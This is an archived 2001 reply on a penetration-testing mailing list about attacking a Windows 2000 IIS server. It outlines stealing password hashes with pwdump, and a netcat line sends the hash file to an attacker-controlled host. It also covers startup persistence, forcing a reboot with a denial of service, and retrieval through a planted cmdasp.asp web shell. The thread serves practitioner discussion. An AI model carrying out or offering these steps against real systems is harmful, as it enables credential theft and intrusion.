Penetration Testing mailing list archives

Re: [PEN-TEST] Expand right under Win2K


From: Complx1 * <complx1 () HUSHMAIL COM>
Date: Wed, 10 Jan 2001 19:33:30 -0800

Apologies for my lack of attention to the question's title.
Win2K: HK only works on NT 4.0.

How about a theoretical, untested scenario then.
Assuming the target is Win2K, IIS v5. Now, depending
on FAT vs. NTFS and firewall ACL conditions, something
along the lines of this might be possible.

Assuming DoS conditions are permitted in the test, what
are your thoughts on wrapping a payload package of pwdump,
netcat, and a batch file?
Write a small batch file that dumps the hash to a text file, then:
nc -v YOURSERVER port < hashdump.txt

Put the payload in the startup method of your choice, or
perhaps work it into a triggered mechanism (but then Unicode
wouldn't do well for that, only the primary intrusion).

DoS the box, notify the admin to reboot, and open your netcat
listener; when the box comes back up, maybe a hash will be
dumped into your netcat port =) Then let the CPU cycles
roll.

I've tested this method several times on a LAN with success.
No Unicode however, only registry methods and the like, so I can't
say how a remote test would turn out.

Last-minute thought: if you made pwdump execute on startup
and let it reside on the disk, you could trigger the hash file
retrieval at will. For instance, maybe you left your cmdasp.asp there
and now the box has been DoS'd; tftp the results of the file
to yourself.
.complx`1
At Wed, 10 Jan 2001 20:26:45 +0100, Tamas Foldi <geza () KAPU HU> wrote:

3. HK doesn't work under Win2K (it produced a permission denied message).
Win2K has never been vulnerable to spoofed LPC port requests.
